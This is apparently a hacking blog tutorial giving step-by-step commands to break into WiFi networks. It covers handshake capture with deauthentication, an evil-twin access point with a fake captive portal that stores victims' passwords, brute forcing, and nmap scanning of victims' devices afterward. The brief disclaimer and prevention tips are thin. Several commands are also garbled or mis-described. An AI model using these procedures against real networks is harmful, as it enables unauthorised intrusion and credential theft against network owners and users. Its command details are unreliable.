In this article, we will discuss the best ways to hack a WiFi network and what we can do to avoid falling prey to WiFi hacks.
Topics to discuss.
-
Hardware tools required.
-
Software required.
-
How to hack wifi.
a. using a 4-way handshake.
b. using evil twin attack.
c. using direct bruteforce.
d. using a 2-way handshake.
-
What to do after hacking wifi?
-
How to prevent such attacks?
-
problems and issues faced in such attacks.
Hardware tools required.
The main hardware requirement is a WiFi adapter that can support monitor mode. The preferred one is an Alfa adapter because it is easy to use in Kali Linux.
Another tool you can use is a raspberry pi for password cracking or you can use a separate computer for the same use.
Software requirements.
There is a wide range of software that can work for hacking WiFi. I will list a few:
- Wifite
- Aircrack-ng
- Kismet
- Reaver
- batch_wifi_brute_forcer(windows)
These are the mainly used tools in WiFi hacking. The first 4 are popular but the last one
batch_wifi_brute_forcer is a tool developed by TUX which uses windows utility which is netsh which is used for wifi connection in windows. I will discuss the working of this tool in detail later in the article. The rest of the tools work on capturing the hash pcap and cap file and the crack them using hashcat, aircrack-ng, and some other tools.
Using the 4-way handshake method.
Overview:-
The 4-way handshake is capturing the WPA or WPA2 hash by intercepting the traffic of the access point and a machine connected with the target access point.
We can achieve this by simultaneously DOS attacking the connected machine for the authentication to happen and the hash to be exchanged by each other in this case the access point and the connected machine.
In this kind of attack, we use the tools which come with the aircrack-ng suite on the software side, and on the hardware side, we need a wifi adapter that supports monitor mode.
Actual attack:-
At the start of the attack, we need to first put the adapter on monitor mode using the airmon-ng module.
$ sudo airmon-ng
The above command will list all the wifi adapters.
$ sudo airmon-ng start wlan0
This command will put your module to monitor mode but it is important to remember what name has your adapter is assigned as a name it can differ (just check once).
The next step is to discover the target SSID I am using an online picture as I cant use mine for obvious reasons hope you understand.
We are using the airodump-ng module to search for the targets.
$ sudo airodump-ng wlan0mon
The above command will show the signals from all the nearby access points.
Now, after deciding the target, you need to start discovering the connected devices to the access point. Now you need to concentrate on some data from the above image first the BSSID of the access point the ESSID of the access point the ENC or encryption and the channel which is CH
These are the necessary information for the next process.
$ sudo aireplay-ng --fakeauth 0 -e "your network ESSID" -a 00:01:02:03:04:05 -o test.cap wlan0mon
In the above attack, we are using the aireplay module. Using the -c, we can specify the channel on which the target is working. We can use thee to specify the ESSID of the access point -a. We can specify the BSSID of the target and using the -fakeauth we can specify the attack vector which is a fake auth module and at last we specify the wifi adapter which is on monitor mode and using the -o we can specify the output file which here I have specified test. cap for easy access.
Now cracking the collected packet which is easy in this case.
$ sudo aircrack-ng test.cap -w passwords.txt
In the above command, you will provide the capture files, and using the -w we will provide the password file and if you are lucky the password will be there in your password file and you will get it by cracking it.
Or if you are not interested in DE authenticating the target you can use this attack.
$ sudo aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 -o test.cap wlan0mon
And then crack the capture file.
Conclusion:-
We can conclude this attack by telling or more precisely warning you that capturing the packet is the easy part and cracking the hash will make you depressed and I am serious.
Keeping that aside this is an effective method to hack wifi.
Using evil twin attack.
Overview:-
An evil twin attack is an attack in which the hacker pretends to be the actual access point and trick the user to connect and give out the password to the actual access point it overhears the password in between the conversation. The major advantage of this attack is you need not use password cracking as you will get the plain text password instead of a hash.
Actual attack:-
For this attack, we are going to do it manually using a monitor mode adapter.
First, install the necessary packages:-
$ sudo apt install hostapd dnsmasq apache2
Second, put the adapter on monitor mode:-
$ sudo airmon-ng start wlan0
Third, make a directory on the home of your desktop:-
$ sudo mkdir ~/fap && cd ~/fap
Forth configure the hostapd.conf file:-
$ sudo nano hostapd.conf
-----------------<nano>-----------------
interface=[INTERFACE NAME]
driver=nl80211
ssid=[WiFi NAME]
hw_mode=g
channel=8
macaddr_acl=0
ignore_broadcast_ssid=0
----------------------------------------
Now in the above config file, we have to specify the monitor mode interface in the interface section and specify the target SSID in the SSID section after changing just do ctrl+x type y and enter accordingly to save the file.
Fifth configure dnsmasq.conf file:-
$ sudo nano dnsmasq.conf
-----------------<nano>-----------------
interface=[INTERFACE NAME]
dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h
dhcp-option=3, 192.168.1.1
dhcp-option=6, 192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
----------------------------------------
And in this, you need to just specify the monitor mode adapters name that’s it.
Sixth create the routing table and gateways:-
$ sudo ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0
$ sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Seventh create a network DHCP and provide internet access to the iptables:-
$ sudo iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
$ sudo iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
Start the SQL database to store the password and user, etc for later use.
$ service mysql start
$ mysql
[Database]> create database fap;
[Database]> create user fapuser;
[Database]> grant all on rogueap.* to 'fapuser'@'localhost' identified by 'fappassword';
[Database]> use fap;
[Database]> create table wpa_keys(password1 varchar(40), password2 varchar(40));
[Database]> ALTER DATABASE fap CHARACTER SET 'utf8';
[Database]> select * from wpa_keys;
Captive portal to trick the wifi user:-
Download the web framework website whichever you want but it should look legit.
Now to create folder in the /var/www/html/ :-
$ sudo rm -rf /var/www/html/*
$ mv ~/Downloads/fap.zip /var/www/html
$ cd /var/www/html
$ unzip fap.zip
$ service apache2 start
Now to start the attack we need do back to the fap folder in the start which is in the home directory.
$ cd ~/fap
$ hostapd hostapd.conf
$ dnsmasq -C dnsmasq.conf -d
$ cd /var/www/html/
$ dnsspoof -i wlan0mon
Now you just need to DOS the actual access point by using your favorite tool and wait for the user to connect to you.
commands copied directly from zsecurity resources.
Conclusion:-
Now after he connects to you he will be prompted for a login where he has to enter the wifi password where if it is a stupid wifi user he will without hesitation and the password will be stored in your MySQL database. This is a really powerful attack and makes hacking wifi easy.
Direct Bruteforce.
Overview:-
Direct Bruteforce is a method is a technique that I love mainly because I have worked on the tool and secondly it is easy to use.
It is Windows only for now and it uses the netsh command-line utility for hacking the wifi network it scans the nearby networks and using the SSID of the target it uses a connect YAML file which is temporarily made to do the auth of the connection and if it is correct it will connect to the network.
Actual attack:-
I will be using the batch_wifi_brute_forcer tool which I use personally and works best and it is very straightforward.
The command is simple just enter wifiscan to scan the networks select a network from the shown list and after that type of attack.
[wifi]> wifiscan
[wifi]>( select network )
[wifi]> attack
Done that’s it to add more passwords to the password list you can add a password file in the BF_Files folder but make sure to rename it passfile.txt as it is the default.
Conclusion:-
This is slow and buggy but it is accurate and effective in all the ways possible. For comparison, this is just like a slow Loris DDOS attack but for wifi.
If you want to download the tool from batch_wifi_brute_forcer.
Using a 2-way handshake.
Overview:-
This is similar to the Evil-Twin attack but this is a different kind of attack which has password cracking also in this attack. In this attack, you are tricking the user to connect to your network and during the 4-way handshake process we will just capture the hash he provides to connect to your network and in this attack, we will be using aircrack-ng and Wireshark we will use aircrack-ng to deauth the user and use Wireshark to filter and capture the packets we want.
Actual attack:-
In this attack, we will first focus on setting up a hotspot on your mobile phone with the same SSID of the network you want to hack and then using Wireshark and aircrack-ng we will filter the packets and crack them.
First:-
Put your wifi adapter on monitor mode.
$ sudo airmon-ng start wlan0mon
Second:-
We need to discover your mobile hotspot.
$ sudo airodump-ng wlan0mon
(this will show all the nearby networks and access points)
Now in the received data, you have to copy the channel your hotspot is running on and you need to copy the BSSID and ESSID, then you can continue with the following steps.
Third:-
We need to start deauthing the actual network to disconnect the people from connecting to that instead connect to your fake hotspot and simultaneously starting your Wireshark listening on that channel. For this example, I am using channel 10 as an example.
$ sudo airodump-ng wlan0mon -c 10 & wireshark
This will start the Wireshark listening on channel 10. Now you need to search for the beacon frame
which has the ESSID of your hotspot and now in that packet search for the transmitter address and then now enter this as your filter to filter out the incoming and outgoing packets from that beacon frame.
wlan.ta == <transmission address> || wlan.da == <transmission address>
After this, you can see all the incoming packets and outgoing packets from the beacon.
Now once the victim tries to connect to the network you can capture it using Wireshark.
Type the following command to filter out the password communication between the beacon and the victim.
eapol || wlan.ta == <transmission address> || wlan.da == <transmission address>
This will filter out the eapol or the correct hash of the original wifi network.
Now you can just save the capture in a pcap format using the Export Specified Packets and export the packets from the filter.
Now it is an easy thing to just crack the password using cracking software like aircrack-ng, rainbow crack, hashcat, omphcrack, etc.
Conclusion:-
This is an effective method as you need not do a lot of deauthing to get the password just use a simple trick to fool the users.
What you can do after hacking wifi?
Once you have gained access to the network you can access all the connected devices in the internal network this is easy as you just need nmap for scanning the entire network to list out the open ports in the machines connected to the network for example if there are 20 different system connected to a router which has a gateway 192.168.1.1 and you have the IP of 192.168.1.20 and by default, there can be a maximum of 200 devices connected to the router which is 192.168.1.200 so you can use this command to search and list out the machines.
$ sudo nmap -sV 192.168.1.1-200
This will scan the internal network and show all the open ports of all the machines connected to the access point.
After this, it is your turn to scan and find a vulnerable port or service and exploit it and get the most of the person’s machine.
This can be easy even for a beginner to do as it is basic enumeration and exploitation.
I will explain how we can do this with a simple example. You can follow along with your practice setup.
Objective: search and select your target
I will first find out my IP gateway and subnet.
$ ifconfig
you can find out your default gateway and how is the subnet is programmed for now I will assume it is 192.168.1.1 and your IP is 192.168.1.20.
Run this command to discover all the connected devices.
$ sudo nmap 192.168.1.1/100
The above command will list all open network systems.
Let’s consider that our target IP is 192.168.1.10. Let’s enumerate that system.
$ nmap -sV -A -p- 192.168.1.10
The above command will show the basic info about the target system and like this, you can enumerate the system further.
Accordingly, you can find the right way around and hack your target system in your practice configuration.
Disclaimer/warnings:
If you don’t want to see yourself in jail for 3-10 years without the option of bail and another 1 year of no electronics with internet so don’t do things that can cause you harm and others harm also learn hacking but ethically. For me, the second option no electronics with the internet scares me the most.
How to prevent such attacks?
To prevent such attacks the most basic thing you can do is to use a long and complex password if you have high priority works in your system it will not harm you by having a huge password as it will protect you from your boss’s anger to lose such classified data.
On the network side, you can update or upgrade your firewall protection and reduce port forwarding to many ports reducing the chance of getting hacked internally.
On the personal computer side, you can reduce the services or update the services to get the latest patched version of the service and servers.
These are the most basic level of prevention you can follow but there are more advanced ones but I don’t want to eat your head by increasing the length of this article also.
Problems faced during these attacks.
The main issue is password cracking which a lengthy, painstaking, and kills us from inside cracking the password as we need to provide the password file which is probably 2-3 gigs in size and contains passwords of about 3 crore passwords in total and takes 2-3 days to complete totally and may not work also so yes it’s frustrating.
The second issue is that it is long and if we miss even one step the entire attack won’t work or even start from the beginning.
Or the worst thing is that the person who has a long and strong password makes it difficult for you to crack it.
Conclusion.
I conclude this article by telling you to need to learn hacking but ethically and make sure that you don’t hack some gov person go behind bars so beware.
Suggestions.
I am writing articles on various hacking topics but I don't know which one is the most required in the present trends in the security field so if you have any topics on which you want articles on the feel free to contact me on the below-given links.
And I am planning to write a walk-through on try hack me rooms so if you have any suggestions contact me.
Sources.
**Zsecurity **And that's it.